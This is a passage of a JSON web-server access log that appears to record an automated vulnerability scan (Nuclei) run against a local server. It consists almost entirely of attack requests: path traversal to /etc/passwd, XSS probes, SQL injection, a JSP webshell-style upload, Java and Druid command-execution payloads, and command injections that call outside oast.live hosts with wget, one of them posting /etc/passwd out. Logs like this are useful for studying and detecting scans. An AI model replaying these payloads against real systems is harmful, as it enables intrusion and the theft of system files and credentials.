Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00./.%00./etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.304","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fca28fg0smpvbd3qg07h0rkk9z6sjqmi81.oast.live%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET @ca28fg0smpvbd3qg07h0ikdgte9fetu7n.oast.live/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filezilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apisix/admin/migrate/export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfwrepo.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=hoSc@dwPT&url=http://ca28fg0smpvbd3qg07h0eogwwjsqx6nw3.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:registerGuest\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22name\x5C\x22:\x5C\x22cve-2020-nuclei\x5C\x22,\x5C\x22email\x5C\x22:\x5C\x22cve@nuclei.local\x5C\x22}],\x5C\x22id\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20ca28fg0smpvbd3qg07h035kfamwbsakd1.oast.live) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"[\x22127.0.0.1:443/ui/\x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casa/nodes/thumbprints HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ca28fg0smpvbd3qg07h0i8rkif81gh599.oast.live:80/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/29KD21SMeXgmOL180SuVch9YGmW.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\x0D\x0A CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\x0D\x0AuserDetails","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitemanager.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loadtextfile.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/super-forms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:loadHistory\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22rid\x5C\x22:\x5C\x22GENERAL\x5C\x22}],\x5C\x22msg\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"{\x0D\x0A\x22type\x22:\x22index\x22,\x0D\x0A\x22spec\x22:{\x0D\x0A \x22ioConfig\x22:{\x0D\x0A \x22type\x22:\x22index\x22,\x0D\x0A \x22firehose\x22:{\x0D\x0A \x22type\x22:\x22local\x22,\x0D\x0A \x22baseDir\x22:\x22/etc\x22,\x0D\x0A \x22filter\x22:\x22passwd\x22\x0D\x0A }\x0D\x0A },\x0D\x0A \x22dataSchema\x22:{\x0D\x0A \x22dataSource\x22:\x22odgjxrrrePz\x22,\x0D\x0A \x22parser\x22:{\x0D\x0A \x22parseSpec\x22:{\x0D\x0A \x22format\x22:\x22javascript\x22,\x0D\x0A \x22timestampSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22dimensionsSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22function\x22:\x22function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\x5C\x22/bin/sh`@~-c`@~cat /etc/passwd\x5C\x22.split(\x5C\x22`@~\x5C\x22)).getInputStream()).useDelimiter(\x5C\x22\x5C\x5CA\x5C\x22).next();return {timestamp:\x5C\x224137368\x5C\x22,OQtGXcxBVQVL: hTVCCerYZ}}\x22,\x0D\x0A \x22\x22:{\x0D\x0A \x22enabled\x22:\x22true\x22\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A},\x0D\x0A\x22samplerConfig\x22:{\x0D\x0A \x22numRows\x22:10\x0D\x0A}\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler 